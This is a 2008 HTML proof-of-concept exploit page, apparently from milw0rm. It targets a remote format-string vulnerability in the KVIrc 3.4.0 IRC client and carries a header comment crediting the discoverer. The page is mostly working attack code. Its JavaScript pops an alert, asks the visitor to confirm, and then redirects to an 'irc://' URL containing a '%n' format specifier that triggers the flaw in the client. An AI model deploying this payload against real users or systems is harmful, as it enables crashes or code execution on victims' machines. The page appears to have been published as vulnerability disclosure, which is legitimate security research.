57 lines
No EOL
1.1 KiB
HTML
57 lines
No EOL
1.1 KiB
HTML
<!--
|
|
|
|
KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)
|
|
|
|
Summary: KVIrc is a free portable IRC client based on the excellent Qt GUI toolkit.
|
|
KVirc is being written by Szymon Stefanek and the KVIrc Development Team with
|
|
the contribution of many IRC addicted developers around the world.
|
|
|
|
Product web page: http://www.kvirc.net/
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
|
|
liquidworm [t00t] gmail [d0t] com
|
|
|
|
http://www.zeroscience.org
|
|
|
|
24.10.2008
|
|
|
|
-->
|
|
|
|
|
|
<html>
|
|
|
|
<title>KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)</Title>
|
|
|
|
<head>
|
|
|
|
<body>
|
|
|
|
<center> <br /> <br /> <strong>Warning ! :)</strong> </center>
|
|
|
|
<body bgcolor="#FFFF00">
|
|
|
|
<script type="text/javascript">
|
|
|
|
alert("KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)\n\n\t\tby LiquidWorm (c) 2008");
|
|
|
|
function poc()
|
|
{
|
|
window.location.href = "irc://A:%n -i";
|
|
}
|
|
|
|
var answ = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation");
|
|
|
|
if (answ == true)
|
|
{
|
|
poc();
|
|
}
|
|
|
|
else
|
|
{
|
|
window.location.href = "http://www.kvirc.net";
|
|
}
|
|
|
|
</script> </body> </head> </html>
|
|
|
|
# milw0rm.com [2008-10-24] |